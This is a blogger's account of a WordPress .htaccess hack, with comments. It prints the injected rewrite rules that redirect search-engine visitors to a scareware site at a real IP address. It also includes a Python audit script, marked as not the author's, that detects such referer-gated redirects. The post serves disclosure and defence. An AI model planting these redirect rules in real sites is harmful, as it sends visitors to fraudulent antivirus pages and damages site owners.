Is Your Blog Vulnerable To Attack?

By Cenay Nailor | Wordpress

Nov 25

A few days ago, I was working on one of my blogs, and I happened to notice that the .htaccess file was larger than I remembered. I am talking about file size here. Yeah, I know. It’s not the kind of thing most people notice, but I kinda have a thing for numbers. And yes, I am a geek.

Anyway… I notice the file size and start thinking, it shouldn’t be that large. So, I download it from my domain to take a peek. Sure enough, some scumbag (bleep) piece of (bleep) hacker type has uploaded a new .htaccess file. Its purpose? To fake people out and sell anti-virus software. That’s it.

The .htaccess file’s real purpose is to help WordPress display *pretty links* as the URL. It takes the title of the post and adds dashes and uses that as the URL. Great for Google Link Love! I put a sample of what that looks like for a typical WordPress blog below. You might want to compare yours…

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

The modified .htaccess file basically says… if someone is *referred* from Google (or AOL, or Yahoo, etc), then display a little window that says they are being attacked, and then redirect them to the site where they can buy some protection. Piece of (bleep). The sad part is that this technique works on a lot of people. And they used MY site to do it!

Can you guess what that does to my reputation for first time visitors?

Here’s the additional code the piece of (bleep) added to my .htaccess file. Again, you might want to review yours and make sure it doesn’t include this.


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

Gotta Respect Google

The downside to having a popular blog? Google comes by often. This would be a good thing, normally. Except for one little thing. Google came by while the bogus .htaccess file was there! Net result? Google thought I was a malware site and set up a redirect page that basically said I was attacking my visitors. Yeah. Cool, huh?

But, you have to respect a service like Google that is simply focused on making the surfing experience a better one for their visitors. They included a note to the webmaster on the nasty-gram-page on what to do to clean your site. Google even offered a *review* process to make sure all the fixes took.

I requested a review at 11am this morning, and by 11pm, my site was back online. Kudos, Google, on having your process down pat and helping *the-little-guy* get back up and running so quickly.

So, do yourself a favor all you self-hosted bloggers out there … go check your .htaccess file. Make sure it only contains what you expect it to contain. And while you are there, update the permissions to remove the *write* feature. I did.
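One way to run the check suggested above, as an added example that is not the author's own code: a Python audit that flags every directive outside the stock WordPress block shown in this post and calls out external redirects gated on the Referer header. The function name `audit_htaccess`, the baseline set and the sample file are assumptions constructed for illustration; swap in your own known-good file as the baseline.

```python
import re

# Baseline: the stock WordPress directives shown in the post (assumed known-good).
EXPECTED = {
    "RewriteEngine On",
    "RewriteBase /",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d",
    "RewriteRule . /index.php [L]",
}
EXTERNAL = re.compile(r"^(?:https?:)?//", re.I)  # substitution that leaves the site

def audit_htaccess(text):
    """Return (line_no, reason, directive) for each directive that needs review."""
    findings = []
    referer_pending = False  # a Referer condition applies to the next RewriteRule
    for no, raw in enumerate(text.splitlines(), 1):
        line = " ".join(raw.split())  # collapse runs of whitespace
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        name = parts[0].lower()  # Apache directive names are case-insensitive
        if name == "rewritecond" and len(parts) > 1 and "http_referer" in parts[1].lower():
            referer_pending = True
            findings.append((no, "condition on Referer", line))
        elif name == "rewriterule" and len(parts) > 2 and EXTERNAL.match(parts[2]):
            gated = " gated on Referer" if referer_pending else ""
            findings.append((no, "external redirect" + gated, line))
            referer_pending = False
        else:
            if name == "rewriterule":
                referer_pending = False
            if line not in EXPECTED:
                findings.append((no, "not in baseline", line))
    return findings

# Constructed sample: stock block plus rules shaped like the injected ones.
# 203.0.113.10 is a documentation address, not the one from the post.
SAMPLE = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://203.0.113.10/in.html [R,L]
"""
```

Running `audit_htaccess(SAMPLE)` reports lines 9 to 11 only; the stock block above them passes cleanly.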

This virus-like behavior hack is also called:

  • 89.28.13.202 virus
  • Redirection hack
  • .htaccess hack

Know of any other names it’s called by?


About the Site Owner

Cenay is a self-proclaimed geek with mad technical skills she loves sharing with Videos, Coaching and Articles.


(8) comments

Cenay,
Thanks for helping turn your experience into an education moment to help other bloggers. Great way to turn a negative into a positive!

I appreciate you, my friend!

Dali


Hey Cenay! Thanks for that post! That’s good stuff to know!
Stinkin hackers!


Thanks for posting this! This is very helpful. I saw this done to a site recently but I am not sure if they used htaccess or how they did it.

Dumb question – how do they get in?


Anna, it’s not a dumb question, just one that can’t be answered easily. In fact, I have my hosting company investigating it even as I type this.

Each web address has a unique IP address, and each hosting account has a unique login. They (low-life hackers) use a program that uses brute force password crackers to stuff passwords until they get a hit.

Since I video steps showing how to create sub domains, install WordPress (and the like), I frequently display my control panel. While I block out certain fields, they may have found my user ID and gone from there.

All we can do is change passwords frequently, report any problems and work hard to stay a step ahead. It’s a full-time job since these losers have nothing better to do.
